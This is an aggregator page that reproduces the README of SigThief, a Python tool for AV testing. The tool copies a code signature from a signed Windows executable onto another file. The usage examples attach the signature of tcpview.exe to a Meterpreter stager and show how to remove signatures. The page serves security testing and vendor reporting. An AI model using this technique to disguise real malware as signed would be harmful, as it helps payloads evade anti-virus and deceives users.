GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → secretsquirrel → Sigthief

secretsquirrel / Sigthief

Licence: bsd-3-clause
Stealing Signatures and Making One Invalid Signature at a Time

Programming Languages

python
139335 projects - #7 most used programming language
python3
1442 projects

Labels

certificatespe

Projects that are alternatives of or similar to Sigthief

Certificates
🛡️ A private certificate authority (X.509 & SSH) & ACME server for secure automated certificate management, so you can use TLS everywhere & SSO for SSH.
Stars: ✭ 3,693 (+344.94%)
Mutual labels:  certificates
Win Acme
A simple ACME client for Windows (for use with Let's Encrypt et al.)
Stars: ✭ 4,305 (+418.67%)
Mutual labels:  certificates
Goblin
An impish, cross-platform binary parsing crate, written in Rust
Stars: ✭ 591 (-28.8%)
Mutual labels:  pe
Penet
Portable Executable (PE) library written in .Net
Stars: ✭ 288 (-65.3%)
Mutual labels:  pe
Sharkey
Sharkey is a service for managing certificates for use by OpenSSH
Stars: ✭ 360 (-56.63%)
Mutual labels:  certificates
Dissection
The dissection of a simple "hello world" ELF binary.
Stars: ✭ 427 (-48.55%)
Mutual labels:  pe
letsencrypt-to-vault
Renew or get Let's Encrypt certificates and send it to Hashicorp Vault
Stars: ✭ 84 (-89.88%)
Mutual labels:  certificates
Manalyze
A static analyzer for PE executables.
Stars: ✭ 701 (-15.54%)
Mutual labels:  pe
Bearparser
Portable Executable parsing library (from PE-bear)
Stars: ✭ 415 (-50%)
Mutual labels:  pe
Rop Tool
A tool to help you write binary exploits
Stars: ✭ 590 (-28.92%)
Mutual labels:  pe
Mkchain
Open source tool to help you build a valid SSL certificate chain.
Stars: ✭ 307 (-63.01%)
Mutual labels:  certificates
Acme Client
Let's Encrypt / ACME client written in PHP for the CLI.
Stars: ✭ 337 (-59.4%)
Mutual labels:  certificates
Freeipa
Mirror of FreeIPA, an integrated security information management solution
Stars: ✭ 520 (-37.35%)
Mutual labels:  certificates
Openshift Acme
ACME Controller for OpenShift and Kubernetes Cluster. (Supports e.g. Let's Encrypt)
Stars: ✭ 287 (-65.42%)
Mutual labels:  certificates
Amber
Reflective PE packer.
Stars: ✭ 594 (-28.43%)
Mutual labels:  pe
keymaster
Short term certificate based identity system (ssh/x509 ca + openidc)
Stars: ✭ 59 (-92.89%)
Mutual labels:  certificates
Ssl Proxy
🔒 Simple zero-config SSL reverse proxy with real autogenerated certificates (LetsEncrypt, self-signed, provided)
Stars: ✭ 427 (-48.55%)
Mutual labels:  certificates
Win Version Info
Windows-only native addon to read version info from executables.
Stars: ✭ 5 (-99.4%)
Mutual labels:  pe
Devcert
Local HTTPS development made easy
Stars: ✭ 655 (-21.08%)
Mutual labels:  certificates
Xca
X Certificate and Key management
Stars: ✭ 574 (-30.84%)
Mutual labels:  certificates
View All Similar Projects ➔

SigThief

Stealing Signatures and Making One Invalid Signature at a Time (Unless you read this: https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf)

https://twitter.com/subTee/status/912769644473098240 alt text

For security professionals only...

What is this?

I've noticed during testing against Anti-Virus over the years that each is different and each prioritize PE signatures differently, whether the signature is valid or not. There are some Anti-Virus vendors that give priority to certain certificate authorities without checking that the signature is actually valid, and there are those that just check to see that the certTable is populated with some value. It's a mess.

So I'm releasing this tool to let you quickly do your testing and feel free to report it to vendors or not.

In short it will rip a signature off a signed PE file and append it to another one, fixing up the certificate table to sign the file.

Of course it's not a valid signature and that's the point!

I look forward to hearing about your results!

How to use

Usage

Usage: sigthief.py [options]

Options:
  -h, --help            show this help message and exit
  -i FILE, --file=FILE  input file
  -r, --rip             rip signature off inputfile
  -a, --add             add signautre to targetfile
  -o OUTPUTFILE, --output=OUTPUTFILE
                        output file
  -s SIGFILE, --sig=SIGFILE
                        binary signature from disk
  -t TARGETFILE, --target=TARGETFILE
                        file to append signature too
  -c, --checksig        file to check if signed; does not verify signature
  -T, --truncate        truncate signature (i.e. remove sig)

Take a Signature from a binary and add it to another binary

$ ./sigthief.py -i tcpview.exe -t x86_meterpreter_stager.exe -o /tmp/msftesting_tcpview.exe 
Output file: /tmp/msftesting_tcpview.exe
Signature appended. 
FIN.

Save Signature to disk for use later

$ ./sigthief.py -i tcpview.exe -r                                                        
Ripping signature to file!
Output file: tcpview.exe_sig
Signature ripped. 
FIN.

Use the ripped signature

$ ./sigthief.py -s tcpview.exe_sig -t x86_meterpreter_stager.exe                               
Output file: x86_meterpreter_stager.exe_signed
Signature appended. 
FIN.

Truncate (remove) signature

This has really interesting results actually, can help you find AVs that value Signatures over functionality of code. Unsign putty.exe ;)

$ ./sigthief.py -i tcpview.exe -T    
Inputfile is signed!
Output file: tcpview.exe_nosig
Overwriting certificate table pointer and truncating binary
Signature removed. 
FIN.

Check if there is a signature (does not check validity)

$ ./sigthief.py -i tcpview.exe -c
Inputfile is signed!
Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].